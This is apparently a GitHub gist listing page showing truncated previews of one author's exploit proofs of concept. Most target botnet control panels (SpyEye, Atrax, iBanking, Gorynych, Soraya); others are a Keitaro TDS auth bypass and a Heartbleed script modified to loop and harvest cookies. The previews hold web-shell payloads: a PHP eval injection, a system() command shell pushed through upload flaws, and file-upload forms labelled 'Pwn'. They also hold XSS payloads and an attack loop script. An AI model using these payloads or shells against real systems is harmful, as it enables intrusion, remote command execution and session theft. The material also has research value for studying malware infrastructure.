Steven K Xyl2k
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Product : SpyEye Form Grabber | |
| * Type : SQL Injection | |
| * File : mod_savecert.php | |
| * Cybercrime-tracker.net, 2013! | |
| */ | |
| ?> | |
| <html> |
Xyl2k
/ Keitaro TDS Auth bypass v6.x - v7.7.10
Created
November 1, 2016 02:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\ | |
| / ___/ / / - _/ __ / __ / ___/ __ / / / ___/\ | |
| / / /__ __/ - / _/_/ _/ / / _/ / / / / _/__\/ | |
| /_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf! | |
| \_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/ | |
| C Y B E R C R i M E W H Q | |
| Keitaro TDS Auth bypass v6.x - v7.7.10 |
Xyl2k
/ heartbleed.py
Created
February 16, 2016 15:39
Python Heartbleed (CVE-2014-0160) Proof of Concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| # Edited spl0it to loop and save cookies. | |
| import sys | |
| import struct | |
| import socket | |
| import time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| # Add URL | |
| # Set a PHP payload | |
| # Go to http://website/config.php | |
| URL = 'http://localhost/Panel/applysettings.php' | |
| PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '" | |
| data = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Gorynych v4.2.0.257- File Upload Vulnerability</title> | |
| <!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b --> | |
| </head> | |
| <body> | |
| <h1>◉ Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability ◉</h1> | |
| <form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data"> | |
| <input type="file" name="upload1"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SpyEye version ? reflected XSS POC | |
| # Xartrick | |
| # Xylitol | |
| import urllib | |
| import urllib2 | |
| # Configuration ... | |
| sPayload = '<script>alert(1);</script>' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Start with PHP CLI (php pwn.php) | |
| set_time_limit(0); | |
| // Adjust this :) | |
| define('SLEEP_TIME', '4'); | |
| define('PAGE_TIME', 4); | |
| define('URL', 'http://localhost/Phase/'); | |
| echo('attacking ' . URL . PHP_EOL); |
Xyl2k
/ Atrax Botnet Shell Upload Vulnerability
Created
November 25, 2014 01:53
Atrax Botnet Shell Upload Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import string | |
| import base64 | |
| import urllib | |
| import urllib2 | |
| # <CONFIG> | |
| payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>' | |
| url = 'http://localhost/atrax/' | |
| # </CONFIG> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- iBanking panel upload vulnerability --> | |
| <!-- get.php?p=..&i=.&f=dbconfig.php --> | |
| <form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data"> | |
| FiLEZ: <input type="file" name="uploadedfile" /><br /> | |
| <input type="hidden" name="bot_id" value="500" /> | |
| <input type="hidden" name="imei" value="000000000000000" /> | |
| <input type="submit" value="Pwn" /> | |
| </form> |
Xyl2k
/ Soraya XSS Vulnerability
Created
September 14, 2014 09:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| def StrToHex(string): | |
| hex_str='' | |
| for char in string: | |
| int_char = ord(char) | |
| hex_num = hex(int_char).lstrip("0x") | |
| hex_str+=hex_num | |
| return hex_str |
NewerOlder